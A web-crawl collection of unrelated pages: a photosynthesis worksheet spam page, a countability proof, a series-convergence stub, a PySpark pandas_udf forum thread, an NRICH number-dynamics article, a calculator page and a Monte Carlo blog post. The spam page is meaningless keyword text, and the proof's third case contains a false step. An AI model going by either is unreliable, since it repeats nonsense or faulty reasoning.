{"ft_lang_label":"__label__en","ft_lang_prob":0.8950891,"math_prob":0.9290374,"size":99771,"snap":"2023-14-2023-23","text_gpt3_token_len":24281,"char_repetition_ratio":0.1793579,"word_repetition_ratio":0.05417305,"special_character_ratio":0.24834871,"punctuation_ratio":0.1905919,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.951795,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34],"im_url_duplicate_count":[null,null,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-30T13:30:19Z\",\"WARC-Record-ID\":\"<urn:uuid:153fa373-7a19-4ac1-9862-86be8f409b99>\",\"Content-Length\":\"456318\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bd9f34f4-c060-4b0a-bb20-27d67644e7f1>\",\"WARC-Concurrent-To\":\"<urn:uuid:635a7fa3-4e87-4f71-8e4b-9c76b2a962e1>\",\"WARC-IP-Address\":\"81.3.21.103\",\"WARC-Target-URI\":\"https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022.html\",\"WARC-Payload-Digest\":\"sha1:V7FRPKDGPHBAH4JNKL2TXJQEIZUQ6ZNO\",\"WARC-Block-Digest\":\"sha1:NVMFWRIGTWZBTEYE56LCVZAVD7LKLCIZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224645810.57_warc_CC-MAIN-20230530131531-20230530161531-00149.warc.gz\"}"}
http://activepatience.com/photosynthesis-diagrams-worksheet/photosynthesis-diagrams-worksheet-blank-leaf-diagram-photosynthesis-house-wiring-diagram-symbols-today-photosynthesis-activity-photosynthesis-worksheet-photosynthesis-diagrams-worksheet-part-2/
[ "# Photosynthesis Diagrams Worksheet Blank Leaf Diagram Photosynthesis House Wiring Diagram Symbols Today Photosynthesis Activity Photosynthesis Worksheet Photosynthesis Diagrams Worksheet Part 2", null, "photosynthesis diagrams worksheet blank leaf diagram photosynthesis house wiring diagram symbols today photosynthesis activity photosynthesis worksheet photosynthesis diagrams worksheet part 2.\n\nstructures photosynthesis diagram worksheet wiring diagrams answers key part 1,photosynthesis diagram worksheet high school diagrams answers key impressive flow chart structures of,photosynthesis diagram worksheet pdf and cellular respiration diagrams structures of answers answer key part 1,photosynthesis diagrams worksheet part 2 diagram high school plant respiration to label custom wiring o pdf,photosynthesis diagrams worksheet answers key biology junction answer structures of,photosynthesis diagram worksheet high school diagrams biology junction answer key answers carbon fixation in definition reactions video botany,photosynthesis diagrams worksheet answers part 1 and cellular respiration diagram data wiring key,photosynthesis diagrams worksheet help electrical wiring diagram pdf high school biology junction answers,cellular respiration diagram worksheet photosynthesis and diagrams answers key biology junction answer,structures of photosynthesis diagram answers download wiring diagrams worksheet biology junction high school.\n\nPosted on" ]
[ null, "http://activepatience.com/wp-content/uploads/2018/10/photosynthesis-diagrams-worksheet-blank-leaf-diagram-photosynthesis-house-wiring-diagram-symbols-today-photosynthesis-activity-photosynthesis-worksheet-photosynthesis-diagrams-worksheet-part-2.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71830857,"math_prob":0.6166137,"size":1430,"snap":"2019-13-2019-22","text_gpt3_token_len":221,"char_repetition_ratio":0.29663393,"word_repetition_ratio":0.012345679,"special_character_ratio":0.12727273,"punctuation_ratio":0.059139784,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96181047,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-20T09:23:49Z\",\"WARC-Record-ID\":\"<urn:uuid:4c265671-4605-4645-8d3e-a4f2621baaf1>\",\"Content-Length\":\"46646\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0b3f1c6b-60a7-4e48-8f40-baad0ceb411f>\",\"WARC-Concurrent-To\":\"<urn:uuid:6675e40a-e9a3-4503-9830-7921f747ff16>\",\"WARC-IP-Address\":\"104.28.29.198\",\"WARC-Target-URI\":\"http://activepatience.com/photosynthesis-diagrams-worksheet/photosynthesis-diagrams-worksheet-blank-leaf-diagram-photosynthesis-house-wiring-diagram-symbols-today-photosynthesis-activity-photosynthesis-worksheet-photosynthesis-diagrams-worksheet-part-2/\",\"WARC-Payload-Digest\":\"sha1:5O7MLOSECLNV6XXOXBB64HABCIUSKMWS\",\"WARC-Block-Digest\":\"sha1:KLCUDB357OUNSKS6YWKEPRCGEZT7PD57\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232255837.21_warc_CC-MAIN-20190520081942-20190520103942-00002.warc.gz\"}"}
http://ma3110fall2009.wikidot.com/exercise-7-3-9
[ "Exercise 7.3.9\n##### Claim\n\nThe union of two countable sets is countable.\n\n##### Proof\n\nWe will prove this in three cases.\n\n1. Let both $A$ and $B$ be finite. Then $A \\cup B$ is finite, and therefore is also count-\nable.\n\n2. Assume one of $A$ and $B$ is finite and the other is countably infinite. Assume that $A$ is finite. Since $B$ is countably infinite, there exists a function $f : B \\to \\mathbb{N}$ which is a one-to-one correspondence. For $b_i \\in B$ and $i \\in \\mathbb{N}$, let $f(b_i) = i$. Let $C = A-B$. Therefore $A \\cup B = B \\cup C$. If\n$C$ is an empty set , then $A \\cup B = B \\cup C$ and is countably infinite. If $C$ is a non-empty set, let $C = \\{{c_1, c_2, \\dots c_n\\}$. Define a new function $g : B \\cup C \\to \\mathbb{N}$ via $g(c_j) = j$ and $g(b_i) = n + i$. Therefore $g$ is a one to one correspondence. Therefore $B \\cup C$ is countable and $B \\cup C = A \\cup B$, so $A \\cup B$ is also countable.\n\n3. Let $A$ and $B$ be infinite. Let $C = A-B$. Then $A \\cup B = A \\cup C$. If $C$ is countably infinite then $A \\cup B = A \\cup C$ is countable by part 2. If $C$ is finite then $A \\cup B = A \\cup C$ is also finite and therefore countable.\n\n$\\blacksquare$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8239707,"math_prob":1.0000036,"size":1143,"snap":"2020-24-2020-29","text_gpt3_token_len":400,"char_repetition_ratio":0.19578578,"word_repetition_ratio":0.081196584,"special_character_ratio":0.35870516,"punctuation_ratio":0.124060154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-06T03:28:30Z\",\"WARC-Record-ID\":\"<urn:uuid:62977358-2214-4b78-8ed1-d2067bd08592>\",\"Content-Length\":\"21905\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:521231ce-140a-4612-8470-ae88003a447a>\",\"WARC-Concurrent-To\":\"<urn:uuid:bfbe1855-d1dd-45c9-8c7a-ce4e3947fd07>\",\"WARC-IP-Address\":\"107.20.139.176\",\"WARC-Target-URI\":\"http://ma3110fall2009.wikidot.com/exercise-7-3-9\",\"WARC-Payload-Digest\":\"sha1:DAAA6CQO2DXZNZMQEAP6QY5LMKNLGWOR\",\"WARC-Block-Digest\":\"sha1:FWIBTH2NJ36REM4FIYMD7I7MQT3J65XS\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655890092.28_warc_CC-MAIN-20200706011013-20200706041013-00209.warc.gz\"}"}
http://www.stumblingrobot.com/2016/03/10/determine-convergence-series-1n-2n100-3n1n/
[ "Home » Blog » Determine the convergence of the series (-1)n ((2n+100) / (3n+1))n\n\nDetermine the convergence of the series (-1)n ((2n+100) / (3n+1))n\n\nConsider the series", null, "Determine whether the series converges or diverges. If it converges, determine whether it converges conditionally or absolutely.\n\nThe given series is absolutely convergent.\n\nProof. To see this is absolutely convergent, first we have", null, "Then, looking to apply the root test, we have", null, "And so,", null, "Hence, by the root test, the series converges. Therefore, the given series is absolutely convergent", null, "" ]
[ null, "http://www.stumblingrobot.com/wp-content/ql-cache/quicklatex.com-da65c3b0fa955c325b9e03c3a13448b0_l3.png", null, "http://www.stumblingrobot.com/wp-content/ql-cache/quicklatex.com-f4c9eddb66573f688a741c5b4649b619_l3.png", null, "http://www.stumblingrobot.com/wp-content/ql-cache/quicklatex.com-12673f78abf90ff8211e09f3f2b30648_l3.png", null, "http://www.stumblingrobot.com/wp-content/ql-cache/quicklatex.com-3453b7809248e5e8c097916487031b92_l3.png", null, "http://www.stumblingrobot.com/wp-content/ql-cache/quicklatex.com-d108977a21a0e2720762a2b36c18838e_l3.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8160562,"math_prob":0.98402053,"size":404,"snap":"2019-43-2019-47","text_gpt3_token_len":89,"char_repetition_ratio":0.205,"word_repetition_ratio":0.0,"special_character_ratio":0.18316832,"punctuation_ratio":0.17333333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9886885,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T18:38:57Z\",\"WARC-Record-ID\":\"<urn:uuid:569a5b2e-2b19-4d67-a9b9-32f76dadce75>\",\"Content-Length\":\"56348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e9d742f-14d8-403b-b557-d5255097fd88>\",\"WARC-Concurrent-To\":\"<urn:uuid:92be447c-71ad-4740-bcf2-a294aca495e8>\",\"WARC-IP-Address\":\"194.1.147.70\",\"WARC-Target-URI\":\"http://www.stumblingrobot.com/2016/03/10/determine-convergence-series-1n-2n100-3n1n/\",\"WARC-Payload-Digest\":\"sha1:5LFR4OUSBMSIE4MZ2SURJJ5V7MTIC7LN\",\"WARC-Block-Digest\":\"sha1:QQ6EGH3QCB56WV7POIDBO3GWNXAM2N7Y\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986660231.30_warc_CC-MAIN-20191015182235-20191015205735-00024.warc.gz\"}"}
https://community.cloudera.com/t5/Support-Questions/Pandas-udf-with-a-tuple-pyspark/m-p/190142
[ "Support Questions\n\n# Pandas_udf with a tuple? (pyspark)", null, "alexander_witte\nExplorer\n\nHi!\n\nI have a UDF that returns a tuple object:\n\n```stringSchema = StructType([\nStructField(\"fixedRoute\", StringType(), False),\nStructField(\"accuracy\", IntegerType(), False)])\n\ndef stringClassifier(x,y,z):\n... do some code\nreturn (value1,value2)\nstringClassifier_udf = udf(stringClassifier, stringSchema)\n\n```\n\nI use it in a dataframe like this:\n\n```df = df.select(['route', 'routestring', stringClassifier_udf(x,y,z).alias('newcol')])\n```\n\nThis works fine. I later split that tuple into two distinct columns. The UDF however does some string matching and is somewhat slow as it collects to the driver and then filters through a 10k item list to match a string. (it does this for every row). I've been reading about pandas_udf and Apache Arrow and was curious if running this same function would be possible with pandas_udf... or if this would be help improve the performance..? I think my hangup is that the return value of the UDF is a tuple item... here is my attempt:\n\n```from pyspark.sql.functions import pandas_udf, PandasUDFType\n\nstringSchema = StructType([\nStructField(\"fixedRoute\", StringType(), False),\nStructField(\"accuracy\", IntegerType(), False)])\n\n@pandas_udf(stringSchema)\ndef stringClassifier(x,y,z):\n... do some code\nreturn (value1,value2)\n\n```\n\nOf course this is gives me errors and I've tried decorating the function with: @pandas_udf('list', PandasUDFType.SCALAR)\n\nMy errors looks like this:\n\n`NotImplementedError: Invalid returnType with scalar Pandas UDFs: StructType(List(StructField(fixedRoute,StringType,false),StructField(accuracy,IntegerType,false))) is not supported`\n\nAny idea if there is a way to make this work?\n\nThanks!\n\n2 REPLIES 2", null, "o912451\nNew Contributor\n\nIt looks like you are using a scalar pandas_udf type, which doesn't support returning structs currently. I believe the return type you want is an array of strings, which is supported, so this should work. Try this:\n\n```@pandas_udf(\"array<string>\")\ndef stringClassifier(x,y,z):\n# return a pandas series of a list of strings, that is same length as input - for example\ns = pd.Series([[u\"a\", u\"b\"]] * len(x))\nreturn s```\n\nIf you are using Python 2, make sure your strings are in unicode otherwise they might get interpreted as bytes. Hope that helps!", null, "alexander_witte\nExplorer\n\nHey Bryan thanks so much for taking the time! I think I'm almost there! The hint about the unicode issue helping me get past the first slew of errors. I seem to be running into a length one now however:\n\n```@pandas_udf(\"array<string>\")\ndef stringClassifier(lookupstring, first, last):\n\nlookupstring = lookupstring.to_string().encode(\"utf-8\")\nfirst = first.to_string().encode(\"utf-8\")\nlast = last.to_string().encode(\"utf-8\")\n\n#this part takes the 3 strings above and reaches out to another library to do a string match\nresult = process.extract(lookupstring, lookup_list, limit=4000)\nmatch_list = [item for item in result if item.startswith(first) and item.endswith(last)]\nresult2 = process.extractOne(lookupstring, match_list)\n\nif result2 is not None and result2 > 75:\nelse:\nfail = [\"N/A\",\"0\"]\nreturn pd.Series(fail)\n```\n\nRuntimeError: Result vector from pandas_udf was not the required length: expected 1, got 2\n\nI'm initially passing three strings as variables to the function which then get passed to another library. The result is a tuple which I covert to a list then to a pandas Series object. I'm curious how I can make a 2 item array object a length of 1 ..? I'm obviously missing some basics here.\n\n@Bryan C", null, "Take a Tour of the Community\nDon't have an account?" ]
[ null, "https://community.cloudera.com/html/rank_icons/Rank-4-Explorer.svg", null, "https://community.cloudera.com/html/rank_icons/Rank-3-New-Contributor.svg", null, "https://community.cloudera.com/html/rank_icons/Rank-4-Explorer.svg", null, "https://community.cloudera.com/skins/images/1DE9D8BE8753F1277D0F9516815AB0CE/responsive_peak/images/icon_anonymous_message.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78449047,"math_prob":0.75509596,"size":3500,"snap":"2022-27-2022-33","text_gpt3_token_len":866,"char_repetition_ratio":0.1201373,"word_repetition_ratio":0.036734693,"special_character_ratio":0.25257143,"punctuation_ratio":0.17083947,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9732854,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-03T00:26:30Z\",\"WARC-Record-ID\":\"<urn:uuid:fac1e790-db76-450d-b0ab-cb9d2d8b27fb>\",\"Content-Length\":\"166728\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:12e7479f-e760-4bdf-b3ff-526d4940ba7d>\",\"WARC-Concurrent-To\":\"<urn:uuid:d8ee9171-54ce-4265-82f3-34526eaddd68>\",\"WARC-IP-Address\":\"13.32.208.36\",\"WARC-Target-URI\":\"https://community.cloudera.com/t5/Support-Questions/Pandas-udf-with-a-tuple-pyspark/m-p/190142\",\"WARC-Payload-Digest\":\"sha1:PVPWSB3BLKHUPY4OTZL5NBSJW6LCCYSW\",\"WARC-Block-Digest\":\"sha1:47L3IVBVJH5D5ENHKKZ65XAVGAWEX3I3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104205534.63_warc_CC-MAIN-20220702222819-20220703012819-00405.warc.gz\"}"}
https://nrich.maths.org/1324
[ "# Whole Number Dynamics V\n\n##### Age 14 to 18\n\nPublished 1998 Revised 2011\n\nThe last article Whole Number Dynamics IV was about the rule which takes $N$ to $N^{\\prime}$ where $N$ was written in the form $N=10M+R$ and the remainder $R$ lies between $0$ and $9$ inclusive, and $N^{\\prime}=10R-M$.\n\nWe suggested there that if we start with any whole number and then apply the rule $N \\to N^{\\prime}$ repeatedly, we will eventually reach $0$, or end in a cycle of four numbers. If you check many cases you will find this is so, but of course, this does not prove that it is so.\n\nWe also saw that for any whole number $K$ there are exactly ten numbers which go to $K$ in one step, and these are the numbers: $$-10K, 101-10K, 202-10K, 303-10K, ......, 808-10K, 909-10K$$ As a result of this, we then showed that if $N$ eventually reaches $0$ (after applying the rule sufficiently many times) then $N$ must be a multiple of $101$.\n\nNow it is important to understand that the statement\n\n(1) if $N$ is a multiple of $101$, then $N$ eventually reaches $0$,\n\nis not the same as the statement:\n\n(2) if $N$ eventually reaches $0$, then $N$ is a multiple of $101$.\n\nA good way to see that these are different statements is to consider the following two (very similar) statements:\n\n(3) if a whole number is a squared number, then it is positive or zero,\n\nand\n\n(4) if a whole number is positive or zero, then it is a squared number.\n\nObviously, (3) is true and (4) is false so that these two forms of a statement must be different. Returning to consider the statements (1) and (2), we recall that we have proved (2) in the last article; we shall now prove (1). Note that when combined together, (1) and (2) describe exactly those numbers which will eventually arrive at 0.\n\nTo show that (1) is true, let us consider any whole number $N$ that is a multiple of $101$; we want to show that this eventually reaches $0$. We can write $N= 101 P$, say, where $P$ is a whole number, and we can always write $P$ in the form $P =10 M+ R$, where $R$ is the remainder of $P$ when we divide $P$ by $10$. This means that: $$N = 101P = 101(10M + R) = 1010M + 100R + R = 10 X (101M + 10R) +R$$ so that $R$ is also the remainder of $N$.\n\nApplying the rule to $N$, we see that $N$ goes to $N^{\\prime}$, where $$N^{\\prime} = 10 R - (101 M+ 10 R) = -101 M .$$ This shows, for example, that multiples of $101$ always go to multiples of $101$ (and we also know from last time that they can only come from multiples of $101$), so clearly the number $101$ plays an important role here!\n\nLet us look at what we have just proved a little more closely.\n\nIn fact, we have just seen that if $N = 101(10 M+R)$ then $N^{\\prime}= 101 \\times(-M)$ , and roughly speaking,this says that when we apply the rule we just `drop' the units figure and change the sign). This shows, for example, that:\n\n\\begin{eqnarray} 101 \\times 38792 & \\to & 101 \\times (-3879) \\\\ & \\to & 101 \\times 387 \\\\ & \\to & 101 \\times (-38) \\\\ & \\to & 101 \\times 3 = 303 \\\\ & \\to & 0 \\end{eqnarray}\n\nA similar argument works with $38792$ replaced by any integer and this shows that if a whole number $N$ is a multiple of $101$, then it eventually reaches $0$.\n\nLet us look again at the problem posed at the end of the last article. We asked there whether or not the number $123456$ ends up at $0$ or in a cycle of four numbers? Using a calculator, we see that $123456$ is not a multiple of $101$ so that (by what we have just shown) it cannot end up at $0$.\n\nWhat about the number $12345678987654321$? This number is too big to put on a calculator so we need to find another approach for it would clearly be a very long task indeed to keep on applying the rule to this number! How do we handle this number?\n\nWe want to decide whether or not the number $12345678987654321$ is a multiple of $101$. Of course if a whole number $X$ is a multiple of $101$ then the number $12345678987654321 - X$ is also a multiple of $101$ and conversely, and using this we see that it is enough to subtract multiples of $101$ from $12345678987654321$ and then check whether or not the answer is a multiple of $101$. Better still, if P is any whole number then:\n\n$$10000P = 9999P + P = (99 \\times101)P + P$$ so that $10000 P$ is a multiple of $101$ plus $P$.\n\nThus, $$12345678987654321 = (1234567898765 x 10000) + 4321 = 1234567898765 + 101Q + 4321$$ for some whole number $Q$. Applying this again, we get $$1234567898765 = (123456789 x 10000) + 8765 = 123456789 + 101S + 8765$$ for some whole number $S$, and again, $$123456789 = (12345 x 10000) + 6789 = 12345 + 101T + 6789$$ for some whole number $T$.\n\nPutting all these together, we find that the two numbers $12345678987654321$ and $( 4321 + 8765 + 6789 + 12345)$ differ by a multiple of $101$. It is enough, therefore, to check whether $(4321+8765+6789+12345)$ is, or is not, a multiple of $101$, and we have now reduced the problem to one that we can do on a calculator.\n\nYou can now answer the question : does $12345678987654321$ eventually reach $0$ or not ?\n\nA final question : does $8765432123456789$ eventually reach $0$ or not?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8953377,"math_prob":0.99993443,"size":4989,"snap":"2021-43-2021-49","text_gpt3_token_len":1490,"char_repetition_ratio":0.15827483,"word_repetition_ratio":0.026399156,"special_character_ratio":0.38925636,"punctuation_ratio":0.097345136,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99997973,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-08T00:08:28Z\",\"WARC-Record-ID\":\"<urn:uuid:daf5e61a-0d9b-47e3-88e2-3c1f15306b82>\",\"Content-Length\":\"15853\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31b22c03-073a-4e95-b135-cd2132ea6a58>\",\"WARC-Concurrent-To\":\"<urn:uuid:cff0b118-c95a-4ffe-8dd6-f58f63c986a6>\",\"WARC-IP-Address\":\"131.111.18.195\",\"WARC-Target-URI\":\"https://nrich.maths.org/1324\",\"WARC-Payload-Digest\":\"sha1:WO2GDIYSF4XFLNEUXUVLFAGVNBXZUVZN\",\"WARC-Block-Digest\":\"sha1:I3H77XEX4KO6ZFAQUES2RDZTXS3FKHRW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363420.81_warc_CC-MAIN-20211207232140-20211208022140-00326.warc.gz\"}"}
https://www.emathhelp.net/calculators/linear-algebra/unit-vector-calculator/?u=1%2C+2%2C+1
[ "# Unit Vector Calculator\n\n## Calculate unit vectors step by step\n\nThe calculator will find the unit vector in the direction of the given vector, with steps shown.\n\n$\\langle$ $\\rangle$\nComma-separated.\n\nIf the calculator did not compute something or you have identified an error, or you have a suggestion/feedback, please write it in the comments below.\n\nFind the unit vector in the direction of $\\mathbf{\\vec{u}} = \\left\\langle 1, 2, 1\\right\\rangle$." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7149046,"math_prob":0.9867753,"size":267,"snap":"2022-40-2023-06","text_gpt3_token_len":69,"char_repetition_ratio":0.18250951,"word_repetition_ratio":0.15789473,"special_character_ratio":0.24719101,"punctuation_ratio":0.09803922,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995137,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T03:25:31Z\",\"WARC-Record-ID\":\"<urn:uuid:98ac2e09-4de2-448f-8def-36dd20e6f090>\",\"Content-Length\":\"25031\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d7714e1d-138d-4b16-9e70-eca2a70d915a>\",\"WARC-Concurrent-To\":\"<urn:uuid:44e3332e-f158-4169-bb7e-f2aed08b81f1>\",\"WARC-IP-Address\":\"69.55.60.125\",\"WARC-Target-URI\":\"https://www.emathhelp.net/calculators/linear-algebra/unit-vector-calculator/?u=1%2C+2%2C+1\",\"WARC-Payload-Digest\":\"sha1:6KI2YERKEGYJHJX3Y4PARTIPG7GWDGWA\",\"WARC-Block-Digest\":\"sha1:6RBVPGBYSOUHNKY6QNI5ARQDYNITM765\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337531.3_warc_CC-MAIN-20221005011205-20221005041205-00733.warc.gz\"}"}
https://apps.dtic.mil/sti/citations/AD0613915
[ "# Abstract:\n\nThe flow near the stagnation streamline of a blunt body is often analyzed by using the approximation of local similarity, which reduces the equations of motion to a system of ordinary differential equations. This scheme is equivalent to truncating at one term a powerseries expansion of the flow variables from the stagnation point, neglecting backward influence. The accuracy of such a truncation is examined. The principal assumption is that the Navier-Stokes equations are valid. In addition, it is assumed that the validity of the first truncation can be evaluated by comparing it with the second. The conclusion is that the usual assumption of local similarity is remarkably accurate for predicting flow quantities near the stagnation streamline. Author" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8931505,"math_prob":0.98560977,"size":1050,"snap":"2021-21-2021-25","text_gpt3_token_len":227,"char_repetition_ratio":0.107074566,"word_repetition_ratio":0.0,"special_character_ratio":0.19238095,"punctuation_ratio":0.123655915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9795135,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-13T20:09:03Z\",\"WARC-Record-ID\":\"<urn:uuid:1d4c3321-a437-4c74-9fab-c9c874e66654>\",\"Content-Length\":\"17705\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae5a0c7e-2f91-4825-992b-e1d1698f4279>\",\"WARC-Concurrent-To\":\"<urn:uuid:83054d41-1d71-4d8d-b91b-0f70eefbf3cd>\",\"WARC-IP-Address\":\"131.84.180.30\",\"WARC-Target-URI\":\"https://apps.dtic.mil/sti/citations/AD0613915\",\"WARC-Payload-Digest\":\"sha1:UKO2BVIIXM3VGPIWWRYOK37T3UA33O46\",\"WARC-Block-Digest\":\"sha1:P2SC5DXTRSGIMJEG6HA7UFAQ4CNT4YDR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991943.36_warc_CC-MAIN-20210513173321-20210513203321-00465.warc.gz\"}"}
http://www.quantopia.net/monte-carlo-in-quant-finance/
[ "# Monte Carlo in Quantitative Finance\n\nIn this post I’m going to give a little introduction to Monte Carlo as a method for integration, and try to get server-side scripting working via WordPress!\n\nMonte Carlo is fundamentally a technique for doing numerical integration. If we’re confronted with an integral that we can’t solve analytically, we have an array of possible techniques available to us. For 1d integrals, probably the easiest thing for well-behaved functions is to use Simpson’s rule and integrate across the part we’re interested in. But to do this in many dimensions can be tricky – for each dimension we probably want the same number of partitions, so the overall number of function evaluations scales exponentially with dimension – very bad news! By contrast, Monte Carlo essentially samples the function at random points and takes an average. The higher value points contribute more to the average than lower value points, and the overall error in the average scales as , giving a good approximation relatively quickly for high dimensional problems.\n\nThe quintessential example of a Monte Carlo experiment is a simple process to approximate pi. Consider drawing a circle inscribed into a square, just as shown in the following image:", null, "Now, imagine scattering dried cous-cous over the whole area. They will land randomly all over the surface, and first of all we will sweep away any that fall outside of the square.\n\nWhat next? Well, if we count the number of grains that fell inside the circle, and compare that to the total amount that fell inside the square, what do we expect the ratio to be? As long as they’re not too clustered, the expectation is that it will be , which is of course just the ratio of the areas.\n\nRather than actually counting grains, we can simulate this process on the computer much more quickly. To represent each grain, we simulate two uniform variables, each on the interval [-0.5,0.5]. We treat these as the grain’s x-coordinate and y-coordinate, and calculate the distance from the origin (0,0) by taking the sum of the squares of these. If the sum is less than the square of the radius of the circle (ie. 0.25) then the grain is ‘inside’ the circle, if it is greater then the grain is ‘outside’.\n\nHere is the simulation run for 1000 grains of cous-cous (refresh for a repeat attempt):\n\nGrains Simulated: 1000\nGrains Inside Circle: 785\nOur estimate of pi is 3.14\n\nThe estimate here is probably fairly close – you may have been lucky (or unlucky!), but we claimed that the estimate will converge to the real value of pi with a progressively larger number of grains [exercise: can you demonstrate this using the central limit theorem?]. Well, below you’ll find another simulation, this time going up to a little over a million grains but making estimates each time the number of grains is doubled, and the error in the estimate is compared to the number of grains so far at each step.\n\n number of steps estimate error 2 2 -1.141593 4 3 -0.141593 8 2.5 -0.641593 16 3.25 0.108407 32 3.375 0.233407 64 3.25 0.108407 128 3.1875 0.045907 256 3.03125 -0.110343 512 3.023438 -0.118155 1024 3.054688 -0.086905 2048 3.099609 -0.041983 4096 3.12793 -0.013663 8192 3.133789 -0.007804 16384 3.125488 -0.016104 32768 3.127808 -0.013785 65536 3.138855 -0.002738 131072 3.144653 0.003061 262144 3.143097 0.001504 524288 3.142647 0.001054 1048576 3.142952 0.001359\n\nIt should b fairly straight-forward to copy-paste these figures into excel – does the error fall like as claimed? In fact, the central limit theorem tells us that the mean of the ratio of grains inside should go to a normal distribution with standard deviation proportional to this quantity, so we should expect it to be outside the bound about 30% of the time (if you have calculated the right constant!).\n\nOf course, in the 2 dimensional circle case, a better idea might be to try and put points evenly over the square and count how many of these fall inside/outside. As mentioned before, the benefits of Monte Carlo are most pronounced when there are many dimensions involved. But, this is something like the procedure involved in quasi-Monte Carlo, a procedure that I’ll talk about some other time that doesn’t use random numbers at all…\n\n-QuantoDrifter" ]
[ null, "http://www.quantopia.net/wp-content/uploads/2012/12/squareCircle.png", null ]
